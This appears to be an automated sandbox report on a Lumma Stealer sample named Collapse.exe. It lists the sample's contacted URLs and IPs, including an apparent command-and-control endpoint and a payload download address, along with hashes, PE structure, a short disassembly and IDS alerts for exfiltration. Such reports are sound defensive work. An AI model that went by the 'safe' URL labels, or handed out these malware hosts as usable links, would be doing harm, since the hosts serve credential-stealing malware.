                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://observerfry.lat:443/apiCollapse.exe, 00000006.00000003.1374890812.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1290803924.0000000000F84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://observerfry.lat:443/apin.txtPKCollapse.exe, 00000006.00000002.1689170640.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688591837.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1404122051.0000000000F84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://observerfry.lat/veCollapse.exe, 00000006.00000003.1403631246.000000000101C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://observerfry.lat:443/apiocalCollapse.exe, 00000006.00000002.1689170640.0000000000F84000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688591837.0000000000F84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoCollapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://observerfry.lat/3Collapse.exe, 00000006.00000003.1318726111.000000000101E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://observerfry.lat/apiDeskCollapse.exe, 00000006.00000002.1689342251.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1447252619.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.Collapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://observerfry.lat/Collapse.exe, 00000006.00000003.1688424834.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://ocsp.rootca1.amazontrust.com0:Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.ecosia.org/newtab/Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brCollapse.exe, 00000006.00000003.1341339780.00000000037CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://observerfry.lat/api4Collapse.exe, 00000006.00000003.1341278669.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1339458436.00000000036A8000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1339420217.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1339837879.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1364005005.00000000036AC000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1363796100.00000000036AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://ac.ecosia.org/autocomplete?q=Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://147.45.47.81/conhost.exe)Collapse.exe, 00000006.00000002.1689404392.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688020796.0000000001007000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgCollapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://observerfry.lat/apifMCollapse.exe, 00000006.00000003.1290803924.0000000000FA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://147.45.47.81/pCollapse.exe, 00000006.00000002.1689404392.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688020796.0000000001007000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://147.45.47.81/mCollapse.exe, 00000006.00000002.1689404392.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1688020796.0000000001007000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?Collapse.exe, 00000006.00000003.1340228879.00000000036C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uCollapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9eCollapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgCollapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://observerfry.lat/apifmvhCollapse.exe, 00000006.00000003.1374794026.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1374993674.0000000000FF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Collapse.exe, 00000006.00000003.1291840782.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291946100.00000000036EB000.00000004.00000800.00020000.00000000.sdmp, Collapse.exe, 00000006.00000003.1291761778.00000000036EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://observerfry.lat:443/api%Collapse.exe, 00000006.00000003.1290803924.0000000000F84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctaCollapse.exe, 00000006.00000003.1341744379.000000000102B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        172.67.199.72
                                                                                        observerfry.latUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        147.45.47.81
                                                                                        unknownRussian Federation
                                                                                        2895FREE-NET-ASFREEnetEUfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1580146
                                                                                        Start date and time:2024-12-24 02:16:08 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 5m 33s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:18
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Collapse.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@10/1@1/2
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 66.7%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 96%
                                                                                        • Number of executed functions: 42
                                                                                        • Number of non-executed functions: 128
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target Collapse.exe, PID 3960 because there are no executed function
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        TimeTypeDescription
                                                                                        20:17:07API Interceptor9x Sleep call for process: Collapse.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        172.67.199.72ZysXVT72cl.exeGet hashmaliciousLummaCBrowse
                                                                                          NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                            t8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                              zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                    U8mbM8r793.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      147.45.47.81tyhkamwdmrg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 147.45.47.81/conhost.exe
                                                                                                      fkydjyhjadg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 147.45.47.81/conhost.exe
                                                                                                      Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 147.45.47.81/conhost.exe
                                                                                                      Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 147.45.47.81/conhost.exe
                                                                                                      Script.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 147.45.47.81/conhost.exe
                                                                                                      n7ZKbApaa3.dllGet hashmaliciousLummaC, XmrigBrowse
                                                                                                      • 147.45.47.81/WinRing0x64.sys
                                                                                                      PqSIlYOaIF.exeGet hashmaliciousLummaC, XmrigBrowse
                                                                                                      • 147.45.47.81/WinRing0x64.sys
                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 147.45.47.81/conhost.exe
                                                                                                      Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 147.45.47.81/conhost.exe
                                                                                                      inject.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                                                      • 147.45.47.81/conhost.exe
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      observerfry.latxlSzrIs5h6.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 104.21.36.201
                                                                                                      ZysXVT72cl.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      NxqDwaYpbp.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      2jx1O1t486.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 104.21.36.201
                                                                                                      OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      t8cdzT49Yr.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.36.201
                                                                                                      0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                      • 172.67.199.72
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      FREE-NET-ASFREEnetEUnTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 147.45.49.155
                                                                                                      7A2lfjTYNf.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 147.45.49.155
                                                                                                      6fW0guYpsH.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 147.45.49.155
                                                                                                      FzmtNV0vnG.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 147.45.49.155
                                                                                                      lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 147.45.49.155
                                                                                                      jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                                      • 147.45.112.248
                                                                                                      KNkr78hyig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                      • 147.45.113.159
                                                                                                      Tsy9P2T9yF.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 147.45.113.159
                                                                                                      kGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                                      • 147.45.113.159
                                                                                                      q79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                                                                                      • 147.45.113.159
                                                                                                      CLOUDFLARENETUSSetup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 104.21.48.1
                                                                                                      AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.184.241
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.169.205
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.96.6
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 188.114.96.6
                                                                                                      'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.169.205
                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.191.144
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.27.229
                                                                                                      installer.msiGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.80.93
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.58.45
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      a0e9f5d64349fb13191bc781f81f42e1Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 172.67.199.72
                                                                                                      AxoPac.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      AutoUpdate.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.199.72
                                                                                                      No context
                                                                                                      Process:C:\Users\user\Desktop\Collapse.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):15
                                                                                                      Entropy (8bit):3.906890595608518
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:SXhRi75n:SC5
                                                                                                      MD5:3A33AF4BC7DC9699EE324B91553C2B46
                                                                                                      SHA1:4CCE2BF1011CA006FAAB23506A349173ACC40434
                                                                                                      SHA-256:226D20C16ED4D8DDDFD00870E83E3B6EEDEDB86704A7BF43B5826B71D61500AE
                                                                                                      SHA-512:960194C8B60C086520D1A76B94F52BA88AC2DDEC76A18B2D7ABF758FFFF138E9EDD23E62D4375A34072B42FBA51C6D186554B1AA71D60835EF1E18BEB8873B1D
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:1.29548Enjoy!..
                                                                                                      File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.6146050637831415
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:Collapse.exe
                                                                                                      File size:540'160 bytes
                                                                                                      MD5:06bb4e80f74838278ce9467788cc6d94
                                                                                                      SHA1:5327b59b123d9e888ae42ef10fcf7fda094909e0
                                                                                                      SHA256:09852f87a7032ed63baf8f840d9bb379efb399e42bcdeedf9f4dff5b1b561c31
                                                                                                      SHA512:59862d2365b05d74a308a0d5f5e4da865759ce409a89c55d71f0c396765a82d4be3cb18a8595adef6b3bfd1d261282dcbffb0b1bb57779691bb2712f160b34b9
                                                                                                      SSDEEP:12288:luB9du8NOZx84E5YoSSt9iLS1gYEtAarDRjAMJMq:u9du88Zx8VAZ2gLeMD9AMMq
                                                                                                      TLSH:26B4E001B490C072C9672477A9B6DBAA453EF9304F22AADFA7880D79DB315D0E731B17
                                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...WZig..........".................R.............@.......................................@.................................dH..<..
                                                                                                      Icon Hash:00928e8e8686b000
                                                                                                      Entrypoint:0x40ef52
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows cui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x67695A57 [Mon Dec 23 12:40:55 2024 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:6
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:6
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:6
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:5cc7e689f2864a0a9a8589c00efad8df
                                                                                                      Instruction
                                                                                                      call 00007FCBB95A2A9Ah
                                                                                                      jmp 00007FCBB95A2909h
                                                                                                      mov ecx, dword ptr [00436840h]
                                                                                                      push esi
                                                                                                      push edi
                                                                                                      mov edi, BB40E64Eh
                                                                                                      mov esi, FFFF0000h
                                                                                                      cmp ecx, edi
                                                                                                      je 00007FCBB95A2A96h
                                                                                                      test esi, ecx
                                                                                                      jne 00007FCBB95A2AB8h
                                                                                                      call 00007FCBB95A2AC1h
                                                                                                      mov ecx, eax
                                                                                                      cmp ecx, edi
                                                                                                      jne 00007FCBB95A2A99h
                                                                                                      mov ecx, BB40E64Fh
                                                                                                      jmp 00007FCBB95A2AA0h
                                                                                                      test esi, ecx
                                                                                                      jne 00007FCBB95A2A9Ch
                                                                                                      or eax, 00004711h
                                                                                                      shl eax, 10h
                                                                                                      or ecx, eax
                                                                                                      mov dword ptr [00436840h], ecx
                                                                                                      not ecx
                                                                                                      pop edi
                                                                                                      mov dword ptr [00436880h], ecx
                                                                                                      pop esi
                                                                                                      ret
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      sub esp, 14h
                                                                                                      lea eax, dword ptr [ebp-0Ch]
                                                                                                      xorps xmm0, xmm0
                                                                                                      push eax
                                                                                                      movlpd qword ptr [ebp-0Ch], xmm0
                                                                                                      call dword ptr [00434AC4h]
                                                                                                      mov eax, dword ptr [ebp-08h]
                                                                                                      xor eax, dword ptr [ebp-0Ch]
                                                                                                      mov dword ptr [ebp-04h], eax
                                                                                                      call dword ptr [00434A78h]
                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                      call dword ptr [00434A74h]
                                                                                                      xor dword ptr [ebp-04h], eax
                                                                                                      lea eax, dword ptr [ebp-14h]
                                                                                                      push eax
                                                                                                      call dword ptr [00434B0Ch]
                                                                                                      mov eax, dword ptr [ebp-10h]
                                                                                                      lea ecx, dword ptr [ebp-04h]
                                                                                                      xor eax, dword ptr [ebp-14h]
                                                                                                      xor eax, dword ptr [ebp-04h]
                                                                                                      xor eax, ecx
                                                                                                      leave
                                                                                                      ret
                                                                                                      mov eax, 00004000h
                                                                                                      ret
                                                                                                      push 00437E18h
                                                                                                      call dword ptr [00434AE4h]
                                                                                                      ret
                                                                                                      mov al, 01h
                                                                                                      ret
                                                                                                      push 00030000h
                                                                                                      push 00010000h
                                                                                                      push 00000000h
                                                                                                      call 00007FCBB95AA27Bh
                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x348640x3c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x3a0000x1d70.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x30d080x18.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d0080xc0.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x34a0c0x16c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x2a52b0x2a600ca7697ad91eaacd837ed51179759a947False0.5367809734513275data6.539348053061756IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x2c0000x9d7c0x9e00964f1e27d13bf05fbdae349f651c8112False0.4288221914556962data4.95389314063731IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x360000x25e40x1600f9cffcfbe2a982ed0d73caf2c5c26405False0.40678267045454547data4.770466622070642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .tls0x390000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      .reloc0x3a0000x1d700x1e00050a442cf25b388dea29342e31853d9fFalse0.7709635416666667data6.524650010128688IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                      .bss0x3c0000x4be000x4be00c8b60e8961dfc7f92b470543f456303fFalse1.0003249845551894data7.999427458882808IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                      DLLImport
                                                                                                      KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryAcquireSRWLockExclusive, UnhandledExceptionFilter, WaitForSingleObjectEx, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                      USER32.dllDefWindowProcW
                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                      2024-12-24T02:17:07.075896+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749699172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:07.818283+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749699172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:07.818283+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749699172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:09.058332+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:09.821663+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749700172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:09.821663+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:11.496122+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749701172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:12.704980+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749701172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:14.075000+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:16.375867+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749709172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:19.765970+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749715172.67.199.72443TCP
                                                                                                      2024-12-24T02:17:22.776587+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749726172.67.199.72443TCP
